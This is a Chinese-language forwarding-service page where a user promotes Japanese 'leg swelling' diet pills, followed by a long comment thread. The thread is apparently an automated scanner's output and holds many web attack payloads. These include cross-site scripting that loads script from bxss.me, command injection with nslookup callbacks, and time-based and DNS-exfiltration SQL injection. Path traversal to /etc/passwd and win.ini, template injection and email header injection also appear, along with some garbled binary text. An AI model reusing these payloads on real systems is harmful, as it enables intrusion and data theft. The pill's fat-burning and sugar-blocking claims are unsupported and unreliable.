郵包轉運站,你的外國購物代運站

 語言     選擇地區     電話:36931234

郵包分享

分享海外網購的資訊及買到的筍貨,至少包含50字描述、相關連結及相片一張。分享內容不可抄襲,經Shipbao審核成功後,可獲取30積分(相等於$3)作運費之用。


我要分享

SPEED SHAPE 下半身腿部排水腫浮腫丸

分享者:Maggie   訪問:310   分享時間:2019-05-20 11:50:21
SPEED SHAPE 下半身腿部排水腫浮腫丸
SPEED SHAPE 下半身腿部排水腫浮腫丸

Amazon.co.jp 現有 SPEED SHAPE 下半身腿部排水腫浮腫丸 120粒,原價2037日元,現特價日元1200日元,優惠隨時可能失效 非prime會員需湊單滿2000日元免日本境內運費,不滿2000日元需支付400日元日本運費 愛水腫跟想要瘦腿的的妹子們必備的好物之一,SPEED SHAPE 的下半身腿部排水腫浮腫丸。以黑醋粉末為首的七種超奢侈成分共同配合,加速代謝,阻止糖分吸收,分解多余油脂和糖分,加速脂肪燃燒和糖分分解。每天堅持服用,輕輕松松變成纖細美腿哦~~


相關連結:

分享留言

AABCZW
2019-07-12 23:10:47

response.write(9575513*9103535)

AABCZW
2019-07-12 23:10:48

'+response.write(9575513*9103535)+'

AABCZW
2019-07-12 23:10:48

"+response.write(9575513*9103535)+"

AABCZW
2019-07-12 23:10:54

Nxevqk7J

AABCZW
2019-07-12 23:10:54

set|set&set

AABCZW
2019-07-12 23:10:55

1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=064947&r=444-3942&h=444-04b1c-2&/).slice(2),document.documentElement.appendChild(s))//'>

AABCZW
2019-07-12 23:10:56

$(nslookup dns.ce.\064947.444-3943.444.04b1c.\1.bxss.me)

AABCZW
2019-07-12 23:10:56

1'>"><script src=http://bxss.me/s?u=064947&r=444-3945&h=444-04b1c-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,064947,444-3945,444,04b1c,%22%5D"/>

AABCZW
2019-07-12 23:10:57

&nslookup dns.ce.\064947.444-3946.444.04b1c.\1.bxss.me&'\"`0&nslookup dns.ce.\064947.444-3946.444.04b1c.\1.bxss.me&`'

AABCZW
2019-07-12 23:10:57

1

AABCZW
2019-07-12 23:10:58

1

AABCZW
2019-07-12 23:11:01

${10000356+10000371}

AABCZW
2019-07-12 23:11:02

1 bcc:064947.444-3960.444.04b1c.1@bxss.me

AABCZW
2019-07-12 23:11:03

to@example.com> bcc:064947.444-3962.444.04b1c.1@bxss.me

AABCZW
2019-07-12 23:11:03

1

AABCZW
2019-07-12 23:11:08

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

AABCZW
2019-07-12 23:11:09

1some_inexistent_file_with_long_name.jpg

AABCZW
2019-07-12 23:11:09

Http://testasp.vulnweb.com/t/fit.txt

AABCZW
2019-07-12 23:11:09

1

AABCZW
2019-07-12 23:11:10

http://testasp.vulnweb.com/t/fit.txt?.jpg

AABCZW
2019-07-12 23:11:11

testasp.vulnweb.com

AABCZW
2019-07-12 23:11:13

)

AABCZW
2019-07-12 23:11:13

!(()&&!|*|*|

AABCZW
2019-07-12 23:11:13

^(#$!@#$)(()))******

AABCZW
2019-07-12 23:11:15

1

AABCZW
2019-07-12 23:11:15

1

AABCZW
2019-07-12 23:11:15

-1 OR 2+566-566-1=0+0+0+1 --

AABCZW
2019-07-12 23:11:16

-1 OR 2+436-436-1=0+0+0+1

AABCZW
2019-07-12 23:11:16

-1' OR 2+524-524-1=0+0+0+1 --

AABCZW
2019-07-12 23:11:17

-1' OR 2+678-678-1=0+0+0+1 or 'vHauDDAh'='

AABCZW
2019-07-12 23:11:17

-1" OR 2+799-799-1=0+0+0+1 --

AABCZW
2019-07-12 23:11:17

'"()

AABCZW
2019-07-12 23:11:18

if(now()=sysdate(),sleep(15),0)/*'XOR(if(now()=sysdate(),sleep(15),0))OR'"XOR(if(now()=sysdate(),sleep(15),0))OR"*/

AABCZW
2019-07-12 23:11:18

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

AABCZW
2019-07-12 23:11:18

-1; waitfor delay '0:0:15' --

AABCZW
2019-07-12 23:11:19

-1); waitfor delay '0:0:15' --

AABCZW
2019-07-12 23:11:19

1 waitfor delay '0:0:15' --

AABCZW
2019-07-12 23:11:19

W0ZfdoW0'; waitfor delay '0:0:15' --

AABCZW
2019-07-12 23:11:20

-1;select pg_sleep(5); --

AABCZW
2019-07-12 23:11:20

-1);select pg_sleep(5); --

AABCZW
2019-07-12 23:11:21

;print(md5(acunetix_wvs_security_test));

AABCZW
2019-07-12 23:11:21

-1));select pg_sleep(5); --

AABCZW
2019-07-12 23:11:21

';print(md5(acunetix_wvs_security_test));$a='

AABCZW
2019-07-12 23:11:21

EpA1Tnay';select pg_sleep(5); --

AABCZW
2019-07-12 23:11:21

http://testasp.vulnweb.com/t/xss.html?%00.jpg

AABCZW
2019-07-12 23:11:22

";print(md5(acunetix_wvs_security_test));$a="

AABCZW
2019-07-12 23:11:22

nP4K1jdf');select pg_sleep(5); --

AABCZW
2019-07-12 23:11:22

${@print(md5(acunetix_wvs_security_test))}

AABCZW
2019-07-12 23:11:22

aXtvU4Ex'));select pg_sleep(5); --

AABCZW
2019-07-12 23:11:22

${@print(md5(acunetix_wvs_security_test))}\

AABCZW
2019-07-12 23:11:23

1||UTL_INADDR.get_host_address('dns.'||'sqli.064947.444-3973.444.04b1c.1.bxss'||'.me')

AABCZW
2019-07-12 23:11:23

http://hitQwiZ9f7542.bxss.me/

AABCZW
2019-07-12 23:11:23

12345'"\'\");|]*{ <>''

AABCZW
2019-07-12 23:11:24

'||UTL_INADDR.get_host_address('dns.'||'sqli.064947.444-3974.444.04b1c.1.bxss'||'.me')||'

AABCZW
2019-07-12 23:11:24

index.php

AABCZW
2019-07-12 23:11:24

index.php

AABCZW
2019-07-12 23:11:24

1;copy (select '') to program 'nslookup dns.sqli.\064947.444-3975.444.04b1c.\1.bxss.me'

AABCZW
2019-07-12 23:11:25

index.php/.

AABCZW
2019-07-12 23:11:25

1';copy (select '') to program 'nslookup dns.sqli.\064947.444-3976.444.04b1c.\1.bxss.me

AABCZW
2019-07-12 23:11:26

287'

AABCZW
2019-07-12 23:11:26

../../../../../../../../../../etc/passwd

AABCZW
2019-07-12 23:11:26

1

AABCZW
2019-07-12 23:11:26

../../../../../../../../../../../../../../../proc/version

AABCZW
2019-07-12 23:11:27

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

AABCZW
2019-07-12 23:11:27

1

AABCZW
2019-07-12 23:11:27

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

AABCZW
2019-07-12 23:11:27

/www.vulnweb.com

AABCZW
2019-07-12 23:11:27

../../../../../../../../../../etc/passwd.jpg

AABCZW
2019-07-12 23:11:28

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

AABCZW
2019-07-12 23:11:28

/../..//../..//../..//../..//../..//etc/passwd.jpg

AABCZW
2019-07-12 23:11:28

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

AABCZW
2019-07-12 23:11:28

'"

AABCZW
2019-07-12 23:11:29

/etc/passwd

AABCZW
2019-07-12 23:11:29

<!--

AABCZW
2019-07-12 23:11:29

%2fetc%2fpasswd

AABCZW
2019-07-12 23:11:29

/.././.././.././.././.././.././.././../etc/./passwd%00

AABCZW
2019-07-12 23:11:30

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

AABCZW
2019-07-12 23:11:30

1'"

AABCZW
2019-07-12 23:11:30

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

AABCZW
2019-07-12 23:11:30

\

AABCZW
2019-07-12 23:11:30

................etc/passwd

AABCZW
2019-07-12 23:11:30

1%2527%2522

AABCZW
2019-07-12 23:11:31

@@2gWvU

AABCZW
2019-07-12 23:11:31

JyI=

AABCZW
2019-07-12 23:11:31

'"

AABCZW
2019-07-12 23:11:32

''""

AABCZW
2019-07-12 23:11:32

file:///etc/passwd

AABCZW
2019-07-12 23:11:32

/\../\../\../\../\../\../\../etc/passwd

AABCZW
2019-07-12 23:11:32

WEB-INF/web.xml

AABCZW
2019-07-12 23:11:33

/WEB-INF/web.xml

AABCZW
2019-07-12 23:11:33

WEB-INF\web.xml

AABCZW
2019-07-12 23:11:33

1

AABCZW
2019-07-12 23:11:33

../../../../../../../../../../windows/win.ini

AABCZW
2019-07-12 23:11:33

C:\WINDOWS\system32\drivers\etc\hosts

AABCZW
2019-07-12 23:11:34

../../../../../../../../../../windows/win.ini.jpg

AABCZW
2019-07-12 23:11:34

windowswin.ini

AABCZW
2019-07-12 23:11:34

................windowswin.ini

AABCZW
2019-07-12 23:11:35

..\..\..\..\..\..\..\..\windows\win.ini

AABCZW
2019-07-12 23:11:35

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

AABCZW
2019-07-12 23:11:35

1

AABCZW
2019-07-12 23:11:36

1

AABCZW
2019-07-12 23:11:36

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

AABCZW
2019-07-12 23:11:36

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

AABCZW
2019-07-12 23:11:41

WEB-INF/web.xml

AABCZW
2019-07-12 23:11:41

WEB-INF\web.xml

AABCZW
2019-07-12 23:13:05

1'"()&%<acx><ScRiPt >xFBm(9466)</ScRiPt>

AABCZW
2019-07-12 23:13:06

'"()&%<acx><ScRiPt >xFBm(9677)</ScRiPt>

AABCZW
2019-07-12 23:13:07

19010940

AABCZW
2019-07-12 23:13:09

acu9257<s1﹥s2ʺs3ʹuca9257

AABCZW
2019-07-12 23:13:13

acux3910z1z2abcxuca3910

AABCZW
2019-07-12 23:13:18

CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL<6L_w~[/[m{:n-.d1d?60

AABCZW
2019-07-12 23:13:18

{{10000498*9999979}}

AABCZW
2019-07-12 23:13:19

1<ScRiPt >xFBm(9384)</ScRiPt>

AABCZW
2019-07-12 23:13:22

1<WZW496>GSYEX[!+!]</WZW496>

AABCZW
2019-07-12 23:13:26

1<script>xFBm(9905)</script>

AABCZW
2019-07-12 23:13:28

1<ScR<ScRiPt>IpT>xFBm(9688)</sCr<ScRiPt>IpT>

AABCZW
2019-07-12 23:13:30

1<ScRiPt >xFBm(9160)</ScRiPt>

AABCZW
2019-07-12 23:13:31

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9998></ScRiPt>

AABCZW
2019-07-12 23:13:32

1<ScRiPt >xFBm(9872)</ScRiPt>

AABCZW
2019-07-12 23:13:33

1<video><source onerror="javascript:xFBm(9635)">

AABCZW
2019-07-12 23:13:34

1<svg onload=xFBm(9751);>

AABCZW
2019-07-12 23:13:36

1<isindex type=image src=1 onerror=xFBm(9814)>

AABCZW
2019-07-12 23:13:37

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9115'>

AABCZW
2019-07-12 23:13:37

1<body onload=xFBm(9978)>

AABCZW
2019-07-12 23:13:38

1<img src=//testasp.vulnweb.com/t/dot.gif onload=xFBm(9924)>

AABCZW
2019-07-12 23:13:38

1<img src=xyz OnErRor=xFBm(9799)>

AABCZW
2019-07-12 23:13:39

1<img/src=">" onerror=alert(9174)>

AABCZW
2019-07-12 23:13:40

%31%3C%53%63%52%69%50%74%20%3E%78%46%42%6D%289207%29%3C%2F%73%43%72%69%70%54%3E

AABCZW
2019-07-12 23:13:40

1\u003CScRiPt\xFBm(9890)\u003C/sCripT\u003E

AABCZW
2019-07-12 23:13:41

1&lt;ScRiPt&gt;xFBm(9902)&lt;/sCripT&gt;

AABCZW
2019-07-12 23:13:41

<img acu onmouseover=xFBm(9534) //>

AABCZW
2019-07-12 23:13:42

1<input autofocus onfocus=xFBm(9488)>

AABCZW
2019-07-12 23:13:42

<a HrEF=http://www.vulnweb.com></a>

AABCZW
2019-07-12 23:13:43

<a HrEF=jaVaScRiPT:>

AABCZW
2019-07-12 23:13:43

[url=http://www.vulnweb.com][/url]

AABCZW
2019-07-12 23:13:44

1<img<!-- --> src=x onerror=alert(9266);//><!-- -->

AABCZW
2019-07-12 23:13:45

1}body{acu:Expre/**/SSion(xFBm(9472))}

AABCZW
2019-07-12 23:13:46

1<% contenteditable onresize=xFBm(9740)>

AABCZW
2019-07-12 23:13:46

10Vekv <ScRiPt >xFBm(9388)</ScRiPt>

AABCZW
2019-07-12 23:13:48

1<WT6CM0>X8OFK[!+!]</WT6CM0>

AABCZW
2019-07-12 23:13:48

1<ifRAme sRc=9105.com></IfRamE>

AABCZW
2019-07-12 23:13:50

1<tvPbD2 x=9188>

AABCZW
2019-07-12 23:13:52

1<img sRc='http://attacker-9312/log.php?

AABCZW
2019-07-12 23:13:53

1<mqK35A<

AABCZW
2019-07-12 23:13:54

1

我要留言


留言不能超過500個字符

  變更
請輸入驗證碼